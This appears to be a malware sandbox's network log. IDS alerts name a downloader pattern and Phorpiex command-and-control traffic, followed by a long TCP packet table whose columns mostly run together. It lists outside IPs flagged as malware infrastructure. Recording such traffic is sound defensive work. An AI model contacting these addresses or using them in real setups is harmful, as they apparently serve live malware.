2024-10-28T11:11:26.495491+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49740 | 91.202.233.141 | 80 | TCP
2024-10-28T11:11:28.559672+0100 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 50345 | 5.75.95.114 | 40500 | UDP
2024-10-28T11:11:29.339713+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 57562 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:29.339713+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 57562 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:31.283957+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 57563 | 185.215.113.66 | 80 | TCP
2024-10-28T11:11:31.283957+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 57563 | 185.215.113.66 | 80 | TCP
TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                  Oct 28, 2024 11:11:13.062946081 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.062952995 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063096046 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063265085 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063277006 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063287020 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063309908 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063333035 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063499928 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063515902 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063529015 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063539982 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063544989 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063550949 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.063566923 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.063592911 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064307928 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064332962 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064347029 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064359903 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064369917 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064399004 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064898014 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064909935 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064922094 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.064945936 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064969063 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.064996958 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065009117 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065037012 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065054893 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065808058 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065819979 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065829039 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065856934 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065857887 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065870047 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.065886974 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.065912962 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066576958 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066622019 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066627026 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066637993 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066664934 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066673040 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066679001 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066685915 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.066709042 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.066726923 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.067468882 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067481041 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067496061 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067513943 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.067522049 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067534924 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.067543983 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.067567110 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068380117 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068391085 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068401098 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068422079 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068423033 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068437099 CET8049730185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:13.068444014 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068466902 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.068481922 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:13.330130100 CET4973080192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.598890066 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.604953051 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:20.605799913 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.606060028 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:20.611977100 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.512868881 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.512989998 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513026953 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513062000 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513088942 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513096094 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513134003 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513163090 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513163090 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513168097 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513197899 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513204098 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513221979 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513237953 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513276100 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.513312101 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.513335943 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.518661022 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.518696070 CET8049731185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:21.518762112 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.593621016 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:21.593739033 CET4973180192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.605431080 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.611645937 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:22.611841917 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.612062931 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:22.618061066 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515336037 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515369892 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515388966 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515407085 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515410900 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515428066 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515435934 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515445948 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515465021 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515475035 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515484095 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515499115 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515501022 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515521049 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.515526056 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.515557051 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.520992041 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.521060944 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.540958881 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.546436071 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.547032118 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.550004005 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.555526972 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.555895090 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:23.561331034 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669003010 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669020891 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669039965 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669099092 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669102907 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669121981 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669161081 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669325113 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669341087 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669357061 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669368982 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669446945 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669723034 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669778109 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.669801950 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.669817924 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.500952005 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.501005888 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.501013041 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.501034021 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.501283884 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641047955 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641144991 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641324043 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641331911 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641393900 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641402960 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641417980 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641417980 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641457081 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641479015 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641901016 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641910076 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641927004 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641933918 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641976118 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.642030001 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.642525911 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642535925 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642551899 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642565966 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642580986 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642595053 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.642616034 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.643533945 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643542051 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643558025 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643564939 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643574953 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643599033 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.643632889 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.644505978 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.644514084 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.644530058 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.644567966 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.644618034 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.646672010 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.646682024 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.646779060 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.646804094 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.646858931 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787031889 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787043095 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787069082 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787079096 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787095070 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787103891 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787121058 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787126064 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787163973 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787175894 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787353039 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787424088 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787431002 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787516117 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787524939 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787540913 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787544012 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787575006 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787601948 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787794113 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787805080 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787830114 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787837982 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787853956 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787859917 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787863970 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787882090 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787900925 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788331032 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788340092 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788348913 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788357019 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788383007 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788414955 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788434029 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788441896 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788456917 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788465023 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788467884 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788476944 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788485050 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788505077 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788542986 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789098024 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789107084 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789123058 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789170027 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789314985 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789330959 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789340019 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789383888 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789388895 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789397001 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789403915 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789410114 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789473057 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:28.278330088 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.278707027 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.414951086 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:28.415043116 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.415307045 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.418035984 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:28.418095112 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.420787096 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339632034 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339646101 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339658022 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339673042 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339682102 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339692116 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339704990 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339714050 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339713097 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339724064 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339735031 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339755058 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339755058 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339896917 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.340420961 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.340646029 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.345300913 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.345419884 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.356348991 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.362339020 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.365775108 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.365884066 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.371840954 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.605326891 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.611072063 CET40500575642.63.29.22192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.613800049 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.615005016 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.620460987 CET40500575642.63.29.22192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.621777058 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.627492905 CET40500575642.63.29.22192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283780098 CET8057563185.215.113.66192.168.2.4
Oct 28, 2024 11:11:31.283879995 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283895969 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283911943 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283926010 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283941984 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283957005 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283957005 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:31.283957005 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:31.283972025 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283988953 CET | 80 | 57563 | 185.215.113.66 | 192.168.2.4
Oct 28, 2024 11:11:31.283993006 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:31.283993006 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:31.284001112 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:31.284034014 CET | 57563 | 80 | 192.168.2.4 | 185.215.113.66
Oct 28, 2024 11:11:33.024405956 CET | 57564 | 40500 | 192.168.2.4 | 2.63.29.22
